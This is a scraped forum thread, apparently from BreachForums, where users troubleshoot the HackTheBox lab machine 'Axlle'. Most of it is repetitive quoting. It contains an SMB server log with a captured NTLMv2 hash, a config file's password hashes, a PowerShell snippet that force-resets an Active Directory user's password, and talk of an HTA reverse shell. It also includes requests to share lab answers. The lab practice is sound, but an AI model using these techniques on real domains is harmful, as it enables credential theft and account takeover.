JOIN BREACHFORUMS TELEGRAM
HTB - Axlle
by Sqweez - Saturday June 22, 2024 at 06:57 PM
Advanced User

Posts: 62
Threads: 4
Joined: Jun 2024
Reputation: 0
#91
Jun 27, 2024, 07:32 AM
(Jun 25, 2024, 02:47 PM)M4nasCieL Wrote: guys, what's next into this?

└─$ impacket-smbserver -smb2support share payload.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*]Config file parsed
[*]Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*]Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*]Config file parsed
[*]Config file parsed
[*]Config file parsed
[*]Incoming connection (10.10.11.21,57530)
[*]AUTHENTICATE_MESSAGE (AXLLE\dallon.matrix,MAINFRAME)
[*]User MAINFRAME\dallon.matrix authenticated successfully
[*]dallon.matrix::AXLLE:aaaaaaaaaaaaaaaa:89f39b5206bd7ce35f3f770276f38154:0101000000000000009f44470ec7da019503d71358dd182900000000010010007600670063007400480075005700650003001000760067006300740048007500570065000200100071004100550058007300640075007100040010007100410055005800730064007500710007000800009f44470ec7da0106000400020000000800300030000000000000000100000000200000e5df1b9451dc6a477af353b3d1c466fa0ed5bed61ec2e6dd6f5a82a4fa120ffe0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00330038000000000000000000
[*]Connecting Share(1:IPC$)
[*]Connecting Share(2Confusedhare)
[*]NetrGetShareInfo Level: 1
[*]Disconnecting Share(1:IPC$)
[*]Disconnecting Share(2Confusedhare)
[*]Closing down connection (10.10.11.21,57530)
[*]Remaining connections []


[*]
im stuck at user privilege Undecided

already cracked everything and i got the password,and still cant connect to  evil-winrm fuck, what is wrong?
Reply
Elite User

Posts: 119
Threads: 10
Joined: Jan 2024
Reputation: 6
#92
Jun 27, 2024, 09:33 AM
(Jun 27, 2024, 07:32 AM)M4nasCieL Wrote:
(Jun 25, 2024, 02:47 PM)M4nasCieL Wrote: guys, what's next into this?

└─$ impacket-smbserver -smb2support share payload.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*]Config file parsed
[*]Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*]Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*]Config file parsed
[*]Config file parsed
[*]Config file parsed
[*]Incoming connection (10.10.11.21,57530)
[*]AUTHENTICATE_MESSAGE (AXLLE\dallon.matrix,MAINFRAME)
[*]User MAINFRAME\dallon.matrix authenticated successfully
[*]dallon.matrix::AXLLE:aaaaaaaaaaaaaaaa:89f39b5206bd7ce35f3f770276f38154:0101000000000000009f44470ec7da019503d71358dd182900000000010010007600670063007400480075005700650003001000760067006300740048007500570065000200100071004100550058007300640075007100040010007100410055005800730064007500710007000800009f44470ec7da0106000400020000000800300030000000000000000100000000200000e5df1b9451dc6a477af353b3d1c466fa0ed5bed61ec2e6dd6f5a82a4fa120ffe0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00330038000000000000000000
[*]Connecting Share(1:IPC$)
[*]Connecting Share(2Confusedhare)
[*]NetrGetShareInfo Level: 1
[*]Disconnecting Share(1:IPC$)
[*]Disconnecting Share(2Confusedhare)
[*]Closing down connection (10.10.11.21,57530)
[*]Remaining connections []


[*]
im stuck at user privilege Undecided

already cracked everything and i got the password,and still cant connect to  evil-winrm fuck, what is wrong?

I am also stuck at this same issue
Reply
katopia.me
VIP
Posts: 245
Threads: 29
Joined: Nov 2023
Reputation: 132
#93
Jun 27, 2024, 11:31 AM (This post was last modified: Jun 27, 2024, 11:44 AM by macavitysworld.)
(Jun 25, 2024, 02:47 PM)M4nasCieL Wrote: guys, what's next into this?

└─$ impacket-smbserver -smb2support share payload.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*]Config file parsed
[*]Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*]Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*]Config file parsed
[*]Config file parsed
[*]Config file parsed
[*]Incoming connection (10.10.11.21,57530)
[*]AUTHENTICATE_MESSAGE (AXLLE\dallon.matrix,MAINFRAME)
[*]User MAINFRAME\dallon.matrix authenticated successfully
[*]dallon.matrix::AXLLE:aaaaaaaaaaaaaaaa:89f39b5206bd7ce35f3f770276f38154:0101000000000000009f44470ec7da019503d71358dd182900000000010010007600670063007400480075005700650003001000760067006300740048007500570065000200100071004100550058007300640075007100040010007100410055005800730064007500710007000800009f44470ec7da0106000400020000000800300030000000000000000100000000200000e5df1b9451dc6a477af353b3d1c466fa0ed5bed61ec2e6dd6f5a82a4fa120ffe0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00330038000000000000000000
[*]Connecting Share(1:IPC$)
[*]Connecting Share(2Confusedhare)
[*]NetrGetShareInfo Level: 1
[*]Disconnecting Share(1:IPC$)
[*]Disconnecting Share(2Confusedhare)
[*]Closing down connection (10.10.11.21,57530)
[*]Remaining connections []


[*]
im stuck at user privilege Undecided

You need to provide the directory path, not the file path.
impacket-smbserver -smb2support <ShareName> <Path>


Suppose `payload.exe` is located in `/home/user/share/`

Then,
impacket-smbserver -smb2support share /home/user/share
(Jun 26, 2024, 11:24 AM)shadow_monarch Wrote: PS C:\Program Files (x86)\hmailserver\Bin> type hMailServer.INI
type hMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=52a1b2a1211e690998e0d2ccb653ff22
[Database]
Type=MSSQLCE
Username=
Password=52abe4d2e16269ddddf7b166218e92d9
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1




I tried both but nothing worked

That's a dead end!
(Jun 27, 2024, 07:32 AM)M4nasCieL Wrote:
(Jun 25, 2024, 02:47 PM)M4nasCieL Wrote: guys, what's next into this?

└─$ impacket-smbserver -smb2support share payload.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*]Config file parsed
[*]Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*]Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*]Config file parsed
[*]Config file parsed
[*]Config file parsed
[*]Incoming connection (10.10.11.21,57530)
[*]AUTHENTICATE_MESSAGE (AXLLE\dallon.matrix,MAINFRAME)
[*]User MAINFRAME\dallon.matrix authenticated successfully
[*]dallon.matrix::AXLLE:aaaaaaaaaaaaaaaa:89f39b5206bd7ce35f3f770276f38154:0101000000000000009f44470ec7da019503d71358dd182900000000010010007600670063007400480075005700650003001000760067006300740048007500570065000200100071004100550058007300640075007100040010007100410055005800730064007500710007000800009f44470ec7da0106000400020000000800300030000000000000000100000000200000e5df1b9451dc6a477af353b3d1c466fa0ed5bed61ec2e6dd6f5a82a4fa120ffe0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00330038000000000000000000
[*]Connecting Share(1:IPC$)
[*]Connecting Share(2Confusedhare)
[*]NetrGetShareInfo Level: 1
[*]Disconnecting Share(1:IPC$)
[*]Disconnecting Share(2Confusedhare)
[*]Closing down connection (10.10.11.21,57530)
[*]Remaining connections []


[*]
im stuck at user privilege Undecided

already cracked everything and i got the password,and still cant connect to  evil-winrm fuck, what is wrong?

Use bloodhound, You can see that `dallon.matrix` is in the user group `WEB DEVS` who has the right to force the user `jocob.greeny & baz.humphries` to change their passwords. Change any one the user's password and login using Evil-Winrm
Thanks @paw for the rank!!
Website
Reply
Elite User

Posts: 119
Threads: 10
Joined: Jan 2024
Reputation: 6
#94
Jun 27, 2024, 11:54 AM (This post was last modified: Jun 27, 2024, 11:56 AM by DoesntMatter123456.)
(Jun 27, 2024, 11:31 AM)macavitysworld Wrote:
(Jun 25, 2024, 02:47 PM)M4nasCieL Wrote: guys, what's next into this?

└─$ impacket-smbserver -smb2support share payload.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*]Config file parsed
[*]Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*]Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*]Config file parsed
[*]Config file parsed
[*]Config file parsed
[*]Incoming connection (10.10.11.21,57530)
[*]AUTHENTICATE_MESSAGE (AXLLE\dallon.matrix,MAINFRAME)
[*]User MAINFRAME\dallon.matrix authenticated successfully
[*]dallon.matrix::AXLLE:aaaaaaaaaaaaaaaa:89f39b5206bd7ce35f3f770276f38154:0101000000000000009f44470ec7da019503d71358dd182900000000010010007600670063007400480075005700650003001000760067006300740048007500570065000200100071004100550058007300640075007100040010007100410055005800730064007500710007000800009f44470ec7da0106000400020000000800300030000000000000000100000000200000e5df1b9451dc6a477af353b3d1c466fa0ed5bed61ec2e6dd6f5a82a4fa120ffe0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00330038000000000000000000
[*]Connecting Share(1:IPC$)
[*]Connecting Share(2Confusedhare)
[*]NetrGetShareInfo Level: 1
[*]Disconnecting Share(1:IPC$)
[*]Disconnecting Share(2Confusedhare)
[*]Closing down connection (10.10.11.21,57530)
[*]Remaining connections []


[*]
im stuck at user privilege Undecided

You need to provide the directory path, not the file path.
impacket-smbserver -smb2support <ShareName> <Path>


Suppose `payload.exe` is located in `/home/user/share/`

Then,
impacket-smbserver -smb2support share /home/user/share
(Jun 26, 2024, 11:24 AM)shadow_monarch Wrote: PS C:\Program Files (x86)\hmailserver\Bin> type hMailServer.INI
type hMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=52a1b2a1211e690998e0d2ccb653ff22
[Database]
Type=MSSQLCE
Username=
Password=52abe4d2e16269ddddf7b166218e92d9
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1




I tried both but nothing worked

That's a dead end!
(Jun 27, 2024, 07:32 AM)M4nasCieL Wrote:
(Jun 25, 2024, 02:47 PM)M4nasCieL Wrote: guys, what's next into this?

└─$ impacket-smbserver -smb2support share payload.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*]Config file parsed
[*]Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*]Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*]Config file parsed
[*]Config file parsed
[*]Config file parsed
[*]Incoming connection (10.10.11.21,57530)
[*]AUTHENTICATE_MESSAGE (AXLLE\dallon.matrix,MAINFRAME)
[*]User MAINFRAME\dallon.matrix authenticated successfully
[*]dallon.matrix::AXLLE:aaaaaaaaaaaaaaaa:89f39b5206bd7ce35f3f770276f38154:0101000000000000009f44470ec7da019503d71358dd182900000000010010007600670063007400480075005700650003001000760067006300740048007500570065000200100071004100550058007300640075007100040010007100410055005800730064007500710007000800009f44470ec7da0106000400020000000800300030000000000000000100000000200000e5df1b9451dc6a477af353b3d1c466fa0ed5bed61ec2e6dd6f5a82a4fa120ffe0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00330038000000000000000000
[*]Connecting Share(1:IPC$)
[*]Connecting Share(2Confusedhare)
[*]NetrGetShareInfo Level: 1
[*]Disconnecting Share(1:IPC$)
[*]Disconnecting Share(2Confusedhare)
[*]Closing down connection (10.10.11.21,57530)
[*]Remaining connections []


[*]
im stuck at user privilege Undecided

already cracked everything and i got the password,and still cant connect to  evil-winrm fuck, what is wrong?

Use bloodhound, You can see that `dallon.matrix` is in the user group `WEB DEVS` who has the right to force the user `jocob.greeny & baz.humphries` to change their passwords. Change any one the user's password and login using Evil-Winrm
Isn't the right way to change jacob.greeny password: (I tried this way, no error but unable to evil-winrm using the newly set password)
$user = Get-ADUser -Identity "jacob.greeny"
$userDN = $user.distinguishedname
$adsiUser = [ADSI]"LDAP://$userDN"
$adsiUser.Invoke("SetPassword", "qazwsxedc")
$adsiUser.CommitChanges()
Reply
katopia.me
VIP
Posts: 245
Threads: 29
Joined: Nov 2023
Reputation: 132
#95
Jun 27, 2024, 12:07 PM
(Jun 27, 2024, 11:54 AM)DoesntMatter123456 Wrote:
(Jun 27, 2024, 11:31 AM)macavitysworld Wrote:
(Jun 25, 2024, 02:47 PM)M4nasCieL Wrote: guys, what's next into this?

└─$ impacket-smbserver -smb2support share payload.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*]Config file parsed
[*]Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*]Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*]Config file parsed
[*]Config file parsed
[*]Config file parsed
[*]Incoming connection (10.10.11.21,57530)
[*]AUTHENTICATE_MESSAGE (AXLLE\dallon.matrix,MAINFRAME)
[*]User MAINFRAME\dallon.matrix authenticated successfully
[*]dallon.matrix::AXLLE:aaaaaaaaaaaaaaaa:89f39b5206bd7ce35f3f770276f38154:0101000000000000009f44470ec7da019503d71358dd182900000000010010007600670063007400480075005700650003001000760067006300740048007500570065000200100071004100550058007300640075007100040010007100410055005800730064007500710007000800009f44470ec7da0106000400020000000800300030000000000000000100000000200000e5df1b9451dc6a477af353b3d1c466fa0ed5bed61ec2e6dd6f5a82a4fa120ffe0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00330038000000000000000000
[*]Connecting Share(1:IPC$)
[*]Connecting Share(2Confusedhare)
[*]NetrGetShareInfo Level: 1
[*]Disconnecting Share(1:IPC$)
[*]Disconnecting Share(2Confusedhare)
[*]Closing down connection (10.10.11.21,57530)
[*]Remaining connections []


[*]
im stuck at user privilege Undecided

You need to provide the directory path, not the file path.
impacket-smbserver -smb2support <ShareName> <Path>


Suppose `payload.exe` is located in `/home/user/share/`

Then,
impacket-smbserver -smb2support share /home/user/share
(Jun 26, 2024, 11:24 AM)shadow_monarch Wrote: PS C:\Program Files (x86)\hmailserver\Bin> type hMailServer.INI
type hMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=52a1b2a1211e690998e0d2ccb653ff22
[Database]
Type=MSSQLCE
Username=
Password=52abe4d2e16269ddddf7b166218e92d9
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1




I tried both but nothing worked

That's a dead end!
(Jun 27, 2024, 07:32 AM)M4nasCieL Wrote:
(Jun 25, 2024, 02:47 PM)M4nasCieL Wrote: guys, what's next into this?

└─$ impacket-smbserver -smb2support share payload.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*]Config file parsed
[*]Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*]Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*]Config file parsed
[*]Config file parsed
[*]Config file parsed
[*]Incoming connection (10.10.11.21,57530)
[*]AUTHENTICATE_MESSAGE (AXLLE\dallon.matrix,MAINFRAME)
[*]User MAINFRAME\dallon.matrix authenticated successfully
[*]dallon.matrix::AXLLE:aaaaaaaaaaaaaaaa:89f39b5206bd7ce35f3f770276f38154:0101000000000000009f44470ec7da019503d71358dd182900000000010010007600670063007400480075005700650003001000760067006300740048007500570065000200100071004100550058007300640075007100040010007100410055005800730064007500710007000800009f44470ec7da0106000400020000000800300030000000000000000100000000200000e5df1b9451dc6a477af353b3d1c466fa0ed5bed61ec2e6dd6f5a82a4fa120ffe0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00330038000000000000000000
[*]Connecting Share(1:IPC$)
[*]Connecting Share(2Confusedhare)
[*]NetrGetShareInfo Level: 1
[*]Disconnecting Share(1:IPC$)
[*]Disconnecting Share(2Confusedhare)
[*]Closing down connection (10.10.11.21,57530)
[*]Remaining connections []


[*]
im stuck at user privilege Undecided

already cracked everything and i got the password,and still cant connect to  evil-winrm fuck, what is wrong?

Use bloodhound, You can see that `dallon.matrix` is in the user group `WEB DEVS` who has the right to force the user `jocob.greeny & baz.humphries` to change their passwords. Change any one the user's password and login using Evil-Winrm
Isn't the right way to change jacob.greeny password: (I tried this way, no error but unable to evil-winrm using the newly set password)
$user = Get-ADUser -Identity "jacob.greeny"
$userDN = $user.distinguishedname
$adsiUser = [ADSI]"LDAP://$userDN"
$adsiUser.Invoke("SetPassword", "qazwsxedc")
$adsiUser.CommitChanges()

Mostly because your password does not comply with the domain's password policy.
Thanks @paw for the rank!!
Website
Reply
Elite User

Posts: 119
Threads: 10
Joined: Jan 2024
Reputation: 6
#96
Jun 27, 2024, 12:12 PM
(Jun 27, 2024, 12:07 PM)macavitysworld Wrote:
(Jun 27, 2024, 11:54 AM)DoesntMatter123456 Wrote:
(Jun 27, 2024, 11:31 AM)macavitysworld Wrote:
(Jun 25, 2024, 02:47 PM)M4nasCieL Wrote: guys, what's next into this?

└─$ impacket-smbserver -smb2support share payload.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*]Config file parsed
[*]Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*]Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*]Config file parsed
[*]Config file parsed
[*]Config file parsed
[*]Incoming connection (10.10.11.21,57530)
[*]AUTHENTICATE_MESSAGE (AXLLE\dallon.matrix,MAINFRAME)
[*]User MAINFRAME\dallon.matrix authenticated successfully
[*]dallon.matrix::AXLLE:aaaaaaaaaaaaaaaa:89f39b5206bd7ce35f3f770276f38154:0101000000000000009f44470ec7da019503d71358dd182900000000010010007600670063007400480075005700650003001000760067006300740048007500570065000200100071004100550058007300640075007100040010007100410055005800730064007500710007000800009f44470ec7da0106000400020000000800300030000000000000000100000000200000e5df1b9451dc6a477af353b3d1c466fa0ed5bed61ec2e6dd6f5a82a4fa120ffe0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00330038000000000000000000
[*]Connecting Share(1:IPC$)
[*]Connecting Share(2Confusedhare)
[*]NetrGetShareInfo Level: 1
[*]Disconnecting Share(1:IPC$)
[*]Disconnecting Share(2Confusedhare)
[*]Closing down connection (10.10.11.21,57530)
[*]Remaining connections []


[*]
im stuck at user privilege Undecided

You need to provide the directory path, not the file path.
impacket-smbserver -smb2support <ShareName> <Path>


Suppose `payload.exe` is located in `/home/user/share/`

Then,
impacket-smbserver -smb2support share /home/user/share
(Jun 26, 2024, 11:24 AM)shadow_monarch Wrote: PS C:\Program Files (x86)\hmailserver\Bin> type hMailServer.INI
type hMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=52a1b2a1211e690998e0d2ccb653ff22
[Database]
Type=MSSQLCE
Username=
Password=52abe4d2e16269ddddf7b166218e92d9
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1




I tried both but nothing worked

That's a dead end!
(Jun 27, 2024, 07:32 AM)M4nasCieL Wrote:
(Jun 25, 2024, 02:47 PM)M4nasCieL Wrote: guys, what's next into this?

└─$ impacket-smbserver -smb2support share payload.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*]Config file parsed
[*]Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*]Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*]Config file parsed
[*]Config file parsed
[*]Config file parsed
[*]Incoming connection (10.10.11.21,57530)
[*]AUTHENTICATE_MESSAGE (AXLLE\dallon.matrix,MAINFRAME)
[*]User MAINFRAME\dallon.matrix authenticated successfully
[*]dallon.matrix::AXLLE:aaaaaaaaaaaaaaaa:89f39b5206bd7ce35f3f770276f38154:0101000000000000009f44470ec7da019503d71358dd182900000000010010007600670063007400480075005700650003001000760067006300740048007500570065000200100071004100550058007300640075007100040010007100410055005800730064007500710007000800009f44470ec7da0106000400020000000800300030000000000000000100000000200000e5df1b9451dc6a477af353b3d1c466fa0ed5bed61ec2e6dd6f5a82a4fa120ffe0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00330038000000000000000000
[*]Connecting Share(1:IPC$)
[*]Connecting Share(2Confusedhare)
[*]NetrGetShareInfo Level: 1
[*]Disconnecting Share(1:IPC$)
[*]Disconnecting Share(2Confusedhare)
[*]Closing down connection (10.10.11.21,57530)
[*]Remaining connections []


[*]
im stuck at user privilege Undecided

already cracked everything and i got the password,and still cant connect to  evil-winrm fuck, what is wrong?

Use bloodhound, You can see that `dallon.matrix` is in the user group `WEB DEVS` who has the right to force the user `jocob.greeny & baz.humphries` to change their passwords. Change any one the user's password and login using Evil-Winrm
Isn't the right way to change jacob.greeny password: (I tried this way, no error but unable to evil-winrm using the newly set password)
$user = Get-ADUser -Identity "jacob.greeny"
$userDN = $user.distinguishedname
$adsiUser = [ADSI]"LDAP://$userDN"
$adsiUser.Invoke("SetPassword", "qazwsxedc")
$adsiUser.CommitChanges()

Mostly because your password does not comply with the domain's password policy.

Good catch. Thanks a ton
Reply
katopia.me
VIP
Posts: 245
Threads: 29
Joined: Nov 2023
Reputation: 132
#97
Jun 27, 2024, 12:18 PM
(Jun 26, 2024, 11:16 AM)DoesntMatter123456 Wrote: Can someone please share administrator Hash to open up this write-up:
https://4xura.com/ctf/htb-writeup-axlle/

@Axura is not using admin hash!
Thanks @paw for the rank!!
Website
Reply
Banned

Posts: 40
Threads: 0
Joined: Mar 2024
Reputation: 0
#98
Jun 27, 2024, 02:02 PM
Anybody know the password of his write-ups

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
VIP User
VIP
Posts: 17
Threads: 0
Joined: Mar 2024
Reputation: 10
#99
Jun 27, 2024, 02:44 PM
(Jun 27, 2024, 02:02 PM)AdenBilal Wrote: Anybody know the password of his write-ups

http://blog.cyberblockz.info/ <-- different writeup
Reply
Breached
Member
Posts: 48
Threads: 3
Joined: Feb 2024
Reputation: 1
#100
Jun 27, 2024, 11:50 PM
Hi everybody. I have two questions:
1. what reverse shell should be in the file shell.hta ?
2. I think i have problem with impacket-smbserver. Works with 127.0.0.1, not works from victim
PLS any help. Thanks advance.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 602 91,594 48 minutes ago
Last Post: sabero_exe
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,944 9 hours ago
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,799 10 hours ago
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,617 Today, 05:08 AM
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,269 Yesterday, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)